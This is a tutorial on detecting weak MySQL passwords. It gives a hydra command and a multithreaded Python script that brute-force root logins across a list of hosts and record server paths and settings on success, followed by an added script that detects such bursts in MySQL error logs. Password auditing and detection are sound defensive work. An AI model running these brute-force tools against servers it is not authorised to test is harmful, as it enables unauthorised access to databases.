How to automatically detect weak MySQL passwords: two methods are introduced here.
1. hydra
hydra is a password brute-forcing tool that ships with Kali Linux.
hydra's usage help:

Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [service://server[:PORT][/OPT]]

Options:
  -R                  restore a previous aborted/crashed session
  -I                  ignore an existing restore file (don't wait 10 seconds)
  -S                  perform an SSL connect
  -s PORT             if the service is on a different default port, define it here
  -l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
  -p PASS  or -P FILE try password PASS, or load several passwords from FILE
  -x MIN:MAX:CHARSET  password bruteforce generation, type "-x -h" to get help
  -y                  disable use of symbols in bruteforce, see above
  -e nsr              try "n" null password, "s" login as pass and/or "r" reversed login
  -u                  loop around users, not passwords (effective! implied with -x)
  -C FILE             colon separated "login:pass" format, instead of -L/-P options
  -M FILE             list of servers to attack, one entry per line, ':' to specify port
  -o FILE             write found login/password pairs to FILE instead of stdout
  -b FORMAT           specify the format for the -o FILE: text(default), json, jsonv1
  -f / -F             exit when a login/pass pair is found (-M: -f per host, -F global)
  -t TASKS            run TASKS number of connects in parallel per target (default: 16)
  -T TASKS            run TASKS connects in parallel overall (for -M, default: 64)
  -w / -W TIME        wait time for a response (32) / between connects per thread (0)
  -c TIME             wait time per login attempt over all threads (enforces -t 1)
  -4 / -6             use IPv4 (default) / IPv6 addresses (put always in [] also in -M)
  -v / -V / -d        verbose mode / show login+pass for each attempt / debug mode
  -O                  use old SSL v2 and v3
  -q                  do not print messages about connection errors
  -U                  service module usage details
  -h                  more command line options (COMPLETE HELP)
  server              the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
  service             the service to crack (see below for supported protocols)
  OPT                 some service modules support additional input (-U for module help)

Supported services: adam6500 asterisk cisco cisco-enable cvs firebird ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp

Hydra is a tool to guess/crack valid login/password pairs. Licensed under AGPLv3.0. The newest version is always available at https://github.com/vanhauser-thc/thc-hydra
Don't use in military or secret service organizations, or for illegal purposes.
These services were not compiled in: afp ncp oracle sapr3.

Use HYDRA_PROXY_HTTP or HYDRA_PROXY environment variables for a proxy setup.
E.g. % export HYDRA_PROXY=socks5://l:p@127.0.0.1:9150 (or: socks4:// connect://)
     % export HYDRA_PROXY=connect_and_socks_proxylist.txt (up to 64 entries)
     % export HYDRA_PROXY_HTTP=http://login:pass@proxy:8080
     % export HYDRA_PROXY_HTTP=proxylist.txt (up to 64 entries)

Examples:
  hydra -l user -P passlist.txt ftp://192.168.0.1
  hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
  hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
  hydra -l admin -p password ftp://[192.168.0.0/24]/
  hydra -L logins.txt -P pws.txt -M targets.txt ssh
For common password wordlists you can use the ones that ship with Kali under /usr/share/wordlists/, or refer to:

Use the command below to test the MySQL servers, where 3306_ips.txt is the list of MySQL server IP addresses and user.txt and password.txt are the username and password dictionaries. -q suppresses connection error messages, -f stops testing a given IP as soon as one valid password is found for it, and -o writes the results to a file.

hydra -L user.txt -P password.txt -M 3306_ips.txt -o hack_result.txt -q -f mysql

Result:
Reference:
2. Using Python to test MySQL passwords
Use Python's MySQL client library to connect to MySQL and try each password in turn.
For connecting to MySQL from Python, refer to: The code is as follows, brute_mysql.py:

# -*- coding:utf-8 -*-
# author:wlj
# time:2020/2/29 22:20
# Test MySQL database passwords against a small weak-password list with Python
import mysql.connector
import threading
import queue

task_queue = queue.Queue()
# password dictionary
weak_pwd_list = ['root', '123456', '12345', 'mysql', '111111', '12345678']
# mutex, used to control thread access to task_queue and to the result file
threadLock = threading.Lock()
RESULT_FILE = 'mysql_weak_pwd.csv'


def test(ip):
    for password in weak_pwd_list:
        try:
            # connect to the database; connection_timeout keeps a dead host from
            # blocking the worker thread indefinitely
            conn = mysql.connector.connect(host=ip, user='root', password=password,
                                           database='mysql', port=3306,
                                           connection_timeout=5)
            cursor = conn.cursor()
            sql = ('SELECT @@global.basedir,@@global.general_log_file,@@global.version,'
                   '@@global.version_compile_os,@@global.secure_file_priv;')
            cursor.execute(sql)
            basedir, general_log_file, version, version_compile_os, secure_file_priv = \
                [str(x) for x in cursor.fetchone()]
            # print(basedir, general_log_file, version, version_compile_os, secure_file_priv)
            cursor.close()  # close the database connection
            conn.close()
            print('%s,%s,%s' % (ip, 'root', password))
            format_str = '%s,' * 8 + '\n'
            # save the result to the file; the lock serialises writes from the worker threads
            with threadLock:
                with open(RESULT_FILE, 'a') as f:
                    f.write(format_str % (ip, 'root', password, basedir, general_log_file,
                                          version, version_compile_os, secure_file_priv))
            return
        except Exception:
            # wrong password, unreachable host, or query error: try the next password
            continue


def brute_mysql():
    while True:
        # acquire the lock for thread synchronisation
        threadLock.acquire()
        if task_queue.empty():
            threadLock.release()
            return
        ip = task_queue.get()
        threadLock.release()
        test(ip)


def main():
    with open('3306_ips.txt', 'r') as f:
        ip_list = f.read().split('\n')
    with open(RESULT_FILE, 'w') as f:
        f.write('ip,user,password,basedir,general_log_file,version,version_compile_os,secure_file_priv\n')
    for ip in ip_list:
        ip = ip.strip()
        if ip:
            task_queue.put(ip)
    threads = []
    for i in range(0, 200):
        t = threading.Thread(target=brute_mysql)
        t.start()
        threads.append(t)
    for t in threads:
        t.join()


if __name__ == '__main__':
    main()
Result:
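Both methods above produce the same footprint on the server side: a burst of failed logins from one source, often against several usernames, within a few seconds. As an added example that is not part of the original post, the following script shows how a defender can spot that pattern in a MySQL error log. It assumes the server is configured to record failed logins in its error log and that the lines use the MySQL 5.7-style "Access denied for user" message shape shown in the constructed sample below; the threshold and window values are assumptions to tune per environment, and the script generalises to a sliding window so that slow, spread-out failures are not flagged by mistake.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Matches the "Access denied" note MySQL writes to its error log for a failed
# login. Assumed 5.7-style shape: "<ISO timestamp>Z <thread id> [Note] Access
# denied for user '<user>'@'<host>' (using password: YES|NO)".
ACCESS_DENIED = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}\.\d+Z)\s+\d+\s+\[\w+\]\s+"
    r"Access denied for user '(?P<user>[^']*)'@'(?P<host>[^']*)'"
    r" \(using password: (?P<pw>YES|NO)\)"
)

# Constructed sample log: one fast burst from 192.0.2.10 (the pattern hydra or
# the script above leaves behind), one slow trickle from 198.51.100.7, one
# unrelated line. Addresses are documentation ranges, not real hosts.
SAMPLE_LOG = """\
2020-02-29T14:20:01.100000Z 12 [Note] Access denied for user 'root'@'192.0.2.10' (using password: YES)
2020-02-29T14:20:01.300000Z 13 [Note] Access denied for user 'root'@'192.0.2.10' (using password: YES)
2020-02-29T14:20:01.500000Z 14 [Note] Access denied for user 'root'@'192.0.2.10' (using password: YES)
2020-02-29T14:20:01.700000Z 15 [Note] Access denied for user 'root'@'192.0.2.10' (using password: YES)
2020-02-29T14:20:01.900000Z 16 [Note] Access denied for user 'root'@'192.0.2.10' (using password: YES)
2020-02-29T14:20:02.100000Z 17 [Note] Access denied for user 'admin'@'192.0.2.10' (using password: YES)
2020-02-29T14:25:00.000000Z 20 [Note] Access denied for user 'app'@'198.51.100.7' (using password: YES)
2020-02-29T14:27:00.000000Z 21 [Note] Access denied for user 'app'@'198.51.100.7' (using password: NO)
2020-02-29T14:29:00.000000Z 22 [Note] Access denied for user 'app'@'198.51.100.7' (using password: YES)
2020-02-29T14:31:00.000000Z 23 [Note] Access denied for user 'app'@'198.51.100.7' (using password: YES)
2020-02-29T14:33:00.000000Z 24 [Note] Access denied for user 'app'@'198.51.100.7' (using password: YES)
2020-02-29T14:33:05.000000Z 25 [Note] Got an error reading communication packets
"""


def parse_access_denied(line):
    """Return (timestamp, user, host) for an access-denied line, or None."""
    m = ACCESS_DENIED.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%Y-%m-%dT%H:%M:%S.%fZ")
    return ts.replace(tzinfo=timezone.utc), m.group("user"), m.group("host")


def find_bruteforce_sources(lines, threshold=5, window_seconds=60):
    """Flag source hosts with >= threshold failed logins inside any
    window_seconds span. Lines are assumed to be in chronological order, as
    an error log is. Returns {host: (total_failures, distinct_users)}."""
    recent = defaultdict(deque)   # host -> timestamps still inside the window
    totals = defaultdict(int)
    users = defaultdict(set)
    flagged_hosts = set()
    for line in lines:
        parsed = parse_access_denied(line)
        if parsed is None:
            continue                  # not a failed login; ignore
        ts, user, host = parsed
        totals[host] += 1
        users[host].add(user)
        q = recent[host]
        q.append(ts)
        cutoff = ts - timedelta(seconds=window_seconds)
        while q and q[0] < cutoff:    # evict attempts that fell out of the window
            q.popleft()
        if len(q) >= threshold:
            flagged_hosts.add(host)
    return {h: (totals[h], len(users[h])) for h in sorted(flagged_hosts)}


if __name__ == "__main__":
    for host, (n, u) in find_bruteforce_sources(SAMPLE_LOG.splitlines()).items():
        print("%s: %d failed logins against %d distinct user(s)" % (host, n, u))
```

With the defaults (5 failures in 60 seconds) only 192.0.2.10 is flagged, since its six failures arrive within a second; 198.51.100.7 also has five failures but spread over eight minutes, so it is left alone. Widening the window to an hour flags both, which is the trade-off to weigh against the rate of ordinary typos in the environment before feeding the output into alerting or an `iptables` / `max_connect_errors` response.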